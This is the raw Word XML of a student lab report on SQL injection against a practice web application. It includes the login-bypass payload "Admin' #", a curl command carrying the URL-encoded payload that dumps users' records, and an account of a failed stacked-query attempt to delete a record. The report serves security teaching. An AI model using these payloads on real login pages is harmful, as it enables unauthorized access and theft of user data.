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9B36B1" w14:textId="2730798F" w:rsidR="000A7356" w:rsidRDefault="00257CF3">
      <w:r>
        <w:t>Q1: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51121606" w14:textId="4F86E0CE" w:rsidR="004D2F59" w:rsidRDefault="00257CF3">
      <w:r>
        <w:t xml:space="preserve">Q2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DEBAD7" w14:textId="53A4BE86" w:rsidR="004D2F59" w:rsidRDefault="004D2F59">
      <w:r>
        <w:t>SELECT * FROM credential WHERE Name = “Alice”</w:t>
      </w:r>
      <w:r w:rsidR="00C005F2">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B42B2F" w14:textId="1FE9A708" w:rsidR="00257CF3" w:rsidRDefault="004D2F59">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4893DF7E" wp14:editId="2CC2DE10">
            <wp:extent cx="5943600" cy="1303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303655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B99760" w14:textId="27F123EE" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="68FC2412" w14:textId="2C00B2BD" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="31D5BB3A" w14:textId="6F7C6D3E" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="1377E72D" w14:textId="79EC625D" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="7C8692C0" w14:textId="51B8D173" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="3A4812CD" w14:textId="7A061D22" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="57989950" w14:textId="143E6490" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="38A49B44" w14:textId="1DE546F6" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="7FE01B3D" w14:textId="5381E520" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="393FE11B" w14:textId="62AB9289" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="6B2187C7" w14:textId="0062E0B9" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="6C53BD65" w14:textId="6395C1A1" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="033221F9" w14:textId="354DF0D3" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="0A1C9E4F" w14:textId="06F1E40A" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="08C614F9" w14:textId="321F56EB" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="775653A1" w14:textId="45D334A9" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="529803E5" w14:textId="2CDA537D" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="4EC1C072" w14:textId="7A00ADAD" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="0713C501" w14:textId="1C797448" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="7A6EBB7B" w14:textId="051B48E9" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="02C8C36D" w14:textId="6AFDE996" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E"/>
    <w:p w14:paraId="29F71A27" w14:textId="03C108BC" w:rsidR="00B57E6E" w:rsidRDefault="00B57E6E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q3.1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6894C9" w14:textId="074DB110" w:rsidR="0097777A" w:rsidRDefault="0097777A" w:rsidP="0097777A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The exact content typed into USERNAME and PASSWORD</w:t>
      </w:r>
      <w:r w:rsidR="00204533">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27485C49" w14:textId="3F1CEB5F" w:rsidR="00F453A5" w:rsidRDefault="00F453A5">
      <w:r>
        <w:t xml:space="preserve">USERNAME: </w:t>
      </w:r>
      <w:r w:rsidR="00036231">
        <w:t xml:space="preserve">Admin’ </w:t>
      </w:r>
      <w:r w:rsidR="0010042F">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EFF7EA" w14:textId="7C837AE7" w:rsidR="00F453A5" w:rsidRDefault="00F453A5">
      <w:r>
        <w:t>PASSWORD</w:t>
      </w:r>
      <w:r w:rsidR="0097777A">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0EDF7C" w14:textId="3F9C894D" w:rsidR="0097777A" w:rsidRDefault="0097777A">
      <w:r>
        <w:t>Note: Nothing is typed into PASSWORD for this attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734C3612" w14:textId="23A1DFDB" w:rsidR="0067498C" w:rsidRDefault="0067498C" w:rsidP="0067498C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Screenshot</w:t>
      </w:r>
      <w:r w:rsidR="009F7E33">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00204533">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC573A8" w14:textId="00AF6FF1" w:rsidR="00802F50" w:rsidRDefault="00802F50" w:rsidP="007A4378">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77943CBC" wp14:editId="4C7ABB90">
            <wp:extent cx="2730500" cy="25387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34056" cy="2542061"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="656629B8" w14:textId="5E6AFC73" w:rsidR="00802F50" w:rsidRDefault="00802F50" w:rsidP="002257D3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B49DF8" wp14:editId="6F68DE15">
            <wp:extent cx="4711700" cy="21041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18715" cy="2107290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="704F7F05" w14:textId="34C8CA85" w:rsidR="004A7E0E" w:rsidRDefault="004A7E0E"/>
    <w:p w14:paraId="160E12C8" w14:textId="628C9505" w:rsidR="004A7E0E" w:rsidRDefault="004A7E0E">
      <w:r>
        <w:t xml:space="preserve">Observation: </w:t>
      </w:r>
      <w:r w:rsidR="002417F1">
        <w:t xml:space="preserve">Given that </w:t>
      </w:r>
      <w:r w:rsidR="00705570">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="002417F1">
        <w:t xml:space="preserve"> know the admin’s account name but not the password. </w:t>
      </w:r>
      <w:r w:rsidR="00705570">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="002417F1">
        <w:t xml:space="preserve"> construct</w:t>
      </w:r>
      <w:r w:rsidR="00705570">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="002417F1">
        <w:t xml:space="preserve"> an SQL injection attack by using the method above which exploits the vulnerability in the dynamic string evaluation in </w:t>
      </w:r>
      <w:r w:rsidR="002417F1" w:rsidRPr="002417F1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unsafe_home.php</w:t>
      </w:r>
      <w:r w:rsidR="002417F1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AE54EA">
        <w:t xml:space="preserve"> In this attack, </w:t>
      </w:r>
      <w:r w:rsidR="00705570">
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00AE54EA">
        <w:t>enter</w:t>
      </w:r>
      <w:r w:rsidR="00705570">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00AE54EA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004E35F8">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00AE54EA">
        <w:t>admin’s account name in the username field, end</w:t>
      </w:r>
      <w:r w:rsidR="00705570">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00AE54EA">
        <w:t xml:space="preserve"> it by a single quote, followed by a comment symbol to comment out the rest SQL logic</w:t>
      </w:r>
      <w:r w:rsidR="004E35F8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CF1CF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00705570">
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00CF1CF7">
        <w:t>le</w:t>
      </w:r>
      <w:r w:rsidR="00705570">
        <w:t>ft</w:t>
      </w:r>
      <w:r w:rsidR="00CF1CF7">
        <w:t xml:space="preserve"> the password field blank because the corresponding SQL logic ha</w:t>
      </w:r>
      <w:r w:rsidR="00705570">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00CF1CF7">
        <w:t xml:space="preserve"> been commented out, so its value does not matter.</w:t>
      </w:r>
      <w:r w:rsidR="00705570">
        <w:t xml:space="preserve"> Finally, I successfully logged into the web application as the administrator. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C64AC4" w14:textId="627C75E1" w:rsidR="00FF1167" w:rsidRDefault="00FF1167">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BFFBEF" w14:textId="0FBAAB63" w:rsidR="00204533" w:rsidRDefault="00204533" w:rsidP="00204533">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The exact command line(s) used for the attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC31E7D" w14:textId="2B444447" w:rsidR="00FF1167" w:rsidRDefault="00E12175" w:rsidP="00204533">
      <w:r>
        <w:t>curl ‘http://www.seedlabsqlinjection.com/unsafe_home.php?username=Admin%27+%23&amp;Password=’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FC1C33" w14:textId="62177625" w:rsidR="00204533" w:rsidRDefault="00204533" w:rsidP="00204533">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The output of the command line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7761468A" w14:textId="74464A54" w:rsidR="00E12175" w:rsidRDefault="00A21272">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B1F6596" wp14:editId="1FCF7232">
            <wp:extent cx="5060356" cy="3117850"/>
            <wp:effectExtent l="0" t="0" r="698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2270" cy="3125191"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="479E7AAA" w14:textId="18AD8F6A" w:rsidR="00A21272" w:rsidRDefault="00A21272">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DE914CA" wp14:editId="11514F52">
            <wp:extent cx="5080000" cy="3504983"/>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9299" cy="3518299"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55639ABE" w14:textId="69343E91" w:rsidR="0042698D" w:rsidRDefault="0042698D"/>
    <w:p w14:paraId="14512ED3" w14:textId="6944A84F" w:rsidR="0042698D" w:rsidRDefault="0042698D" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">HTTP header used for constructing the attack from </w:t>
      </w:r>
      <w:r w:rsidR="005A6AD3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>command line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055E8B09" w14:textId="79A5C7A1" w:rsidR="0042698D" w:rsidRDefault="0042698D" w:rsidP="0042698D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36B5DC84" wp14:editId="3EB4550A">
            <wp:extent cx="5943600" cy="1169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169670"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEC0962" w14:textId="33CCCCE4" w:rsidR="005067D1" w:rsidRDefault="005067D1" w:rsidP="008663C3"/>
    <w:p w14:paraId="645999A5" w14:textId="063441D1" w:rsidR="008663C3" w:rsidRDefault="008663C3" w:rsidP="008663C3">
      <w:r>
        <w:t xml:space="preserve">Observation: </w:t>
      </w:r>
      <w:r w:rsidR="00424612">
        <w:t xml:space="preserve">In this attack, </w:t>
      </w:r>
      <w:r w:rsidR="00686ABB">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00424612">
        <w:t xml:space="preserve"> construct</w:t>
      </w:r>
      <w:r w:rsidR="00686ABB">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00424612">
        <w:t xml:space="preserve"> an SQL injection attack using the command line tool </w:t>
      </w:r>
      <w:r w:rsidR="00424612">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidR="00424612">
        <w:t xml:space="preserve">. First, </w:t>
      </w:r>
      <w:r w:rsidR="00686ABB">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00424612">
        <w:t xml:space="preserve"> use</w:t>
      </w:r>
      <w:r w:rsidR="00686ABB">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00424612">
        <w:t xml:space="preserve"> HTTP Header Live to figure out what the GET request for</w:t>
      </w:r>
      <w:r w:rsidR="00686ABB">
        <w:t xml:space="preserve"> logging in as the administrator and consequently</w:t>
      </w:r>
      <w:r w:rsidR="00424612">
        <w:t xml:space="preserve"> getting </w:t>
      </w:r>
      <w:r w:rsidR="00473445">
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r w:rsidR="00424612">
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="001F0DAF">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00424612">
        <w:t xml:space="preserve"> information looks like by repeating the attack using the webpage in Task 2.1. After obtaining the</w:t>
      </w:r>
      <w:r w:rsidR="001B3BBA">
        <w:t xml:space="preserve"> form of the</w:t>
      </w:r>
      <w:r w:rsidR="00424612">
        <w:t xml:space="preserve"> GET request, we </w:t>
      </w:r>
      <w:r w:rsidR="009A6536">
        <w:t xml:space="preserve">use it to </w:t>
      </w:r>
      <w:r w:rsidR="00424612">
        <w:t xml:space="preserve">construct a curl command with the </w:t>
      </w:r>
      <w:r w:rsidR="00F86C81">
        <w:t>same parameters (username and password) used in Task 2.1.</w:t>
      </w:r>
      <w:r w:rsidR="00C03AD2">
        <w:t xml:space="preserve"> Notice that we encoded the special characters like the single quote and the hash symbol in the request.</w:t>
      </w:r>
      <w:r w:rsidR="00E81817">
        <w:t xml:space="preserve"> Finally, I successfully logged into the web application as the administrator</w:t>
      </w:r>
      <w:r w:rsidR="00F814E9">
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F814E9">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F814E9">
        <w:t xml:space="preserve"> information </w:t>
      </w:r>
      <w:r w:rsidR="001109F9">
        <w:t>wa</w:t>
      </w:r>
      <w:r w:rsidR="00F814E9">
        <w:t>s sent back and displayed on the screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D194261" w14:textId="1D14361E" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="2B6CDD30" w14:textId="0A6E4E70" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="44C3C38D" w14:textId="2531E026" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="0570E92D" w14:textId="57AE0EE1" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="4B7DBC08" w14:textId="31A36722" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="64B8503A" w14:textId="0DEAA8D9" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="7E5C5642" w14:textId="3766227B" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="64458FF0" w14:textId="5BAFE06C" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="05418134" w14:textId="3D0665EF" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="39814496" w14:textId="2F310243" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="0630A108" w14:textId="129E5779" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="5F8E6CD6" w14:textId="75F22A33" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="6649EC46" w14:textId="3CFA1C1C" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="6215407A" w14:textId="64576E25" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="09297BE1" w14:textId="17821293" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="740F4ED7" w14:textId="0A508C37" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="4F1FC211" w14:textId="1064E6D6" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="76953E21" w14:textId="567D5C8B" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3"/>
    <w:p w14:paraId="22541159" w14:textId="4FD355AF" w:rsidR="00BB66F5" w:rsidRDefault="00BB66F5" w:rsidP="008663C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q 3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798AFEC0" w14:textId="06B4C516" w:rsidR="001F7DE0" w:rsidRDefault="00570810" w:rsidP="008663C3">
      <w:r>
        <w:t xml:space="preserve">In Task 2.1, the GET request is submitted through an HTML form, so we do not have to encode the special characters. However, in Task 2.2, the GET request is constructed using the command line tool </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which requires the url to be properly encoded. </w:t>
      </w:r>
      <w:r w:rsidR="004149C5">
        <w:t>Otherwise, the special characters (such as the single quote) will be interpreted by the shell, changing the meaning of the command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF980CE" w14:textId="01CF584C" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="0A7B1FF3" w14:textId="30855392" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="05E3CB8B" w14:textId="0F0450FA" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="33A34EDD" w14:textId="1B1553C9" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="1C3BF989" w14:textId="43E0BEBE" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="20026989" w14:textId="17977B26" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="295C1422" w14:textId="4C7D2016" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="7744CD9F" w14:textId="2591409A" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="506826E4" w14:textId="46A8D597" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="5616D6C0" w14:textId="453955DF" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="43A028D9" w14:textId="724BE8B1" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="652AC2AA" w14:textId="347AD10B" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="66B2724E" w14:textId="66D7F5F9" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="060430EB" w14:textId="69D56A94" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="3B66AD59" w14:textId="6D14F34A" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="57C6546B" w14:textId="6EA1747F" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="42FF0DFE" w14:textId="4DC8ABCE" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="2673D235" w14:textId="445402F6" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="66026AAF" w14:textId="05C3BB2E" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="40F09400" w14:textId="686A97FE" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="5C55DCDD" w14:textId="6506F235" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="5686D8FC" w14:textId="0E3F0D72" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="23F39659" w14:textId="52DB9631" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="4D1DC90A" w14:textId="0AB66C69" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="1369C194" w14:textId="5B33FE8A" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3"/>
    <w:p w14:paraId="74B8E1AD" w14:textId="175E6A03" w:rsidR="002D1CE4" w:rsidRDefault="002D1CE4" w:rsidP="008663C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q 3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C8FF3E" w14:textId="5F29A8CA" w:rsidR="00097EBE" w:rsidRDefault="00097EBE" w:rsidP="008663C3">
      <w:r>
        <w:t>Observation:</w:t>
      </w:r>
      <w:r w:rsidR="00161BF1">
        <w:t xml:space="preserve"> In this attack, </w:t>
      </w:r>
      <w:r w:rsidR="00937072">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00161BF1">
        <w:t xml:space="preserve"> tr</w:t>
      </w:r>
      <w:r w:rsidR="00937072">
        <w:t>ied</w:t>
      </w:r>
      <w:r w:rsidR="00161BF1">
        <w:t xml:space="preserve"> to use the same vulnerability in the previous two tasks </w:t>
      </w:r>
      <w:r w:rsidR="00937072">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00161BF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F551D">
        <w:t xml:space="preserve">execute multiple SQL statements in a single attack. Specifically, </w:t>
      </w:r>
      <w:r w:rsidR="00937072">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="001F551D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D82469">
        <w:t>attempt</w:t>
      </w:r>
      <w:r w:rsidR="00937072">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00D82469">
        <w:t xml:space="preserve"> to execute two SQL statements</w:t>
      </w:r>
      <w:r w:rsidR="00937072">
        <w:t>, where</w:t>
      </w:r>
      <w:r w:rsidR="00D82469">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00937072">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00D82469">
        <w:t>he first one is used to</w:t>
      </w:r>
      <w:r w:rsidR="001F551D">
        <w:t xml:space="preserve"> login as the admin</w:t>
      </w:r>
      <w:r w:rsidR="00D82469">
        <w:t xml:space="preserve">, and the second one is used to delete Ted’s record from the table </w:t>
      </w:r>
      <w:r w:rsidR="00D82469">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>credential</w:t>
      </w:r>
      <w:r w:rsidR="00D82469">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0013398F">
        <w:t xml:space="preserve">The two statements are separated by a semicolon. </w:t>
      </w:r>
      <w:r w:rsidR="00D82469">
        <w:t xml:space="preserve">After </w:t>
      </w:r>
      <w:r w:rsidR="00D11884">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00D82469">
        <w:t xml:space="preserve"> constructed the SQL statements and submit</w:t>
      </w:r>
      <w:r w:rsidR="00D11884">
        <w:t>ted</w:t>
      </w:r>
      <w:r w:rsidR="00D82469">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00D11884">
        <w:t xml:space="preserve"> query</w:t>
      </w:r>
      <w:r w:rsidR="00D82469">
        <w:t xml:space="preserve"> through the login page, an error occurred saying “</w:t>
      </w:r>
      <w:r w:rsidR="009C1A0B">
        <w:t>There was an error running the query [You have an error in your SQL syntax ……] ……”.</w:t>
      </w:r>
      <w:r w:rsidR="00F56201">
        <w:t xml:space="preserve"> The attack was not successful.</w:t>
      </w:r>
    </w:p>
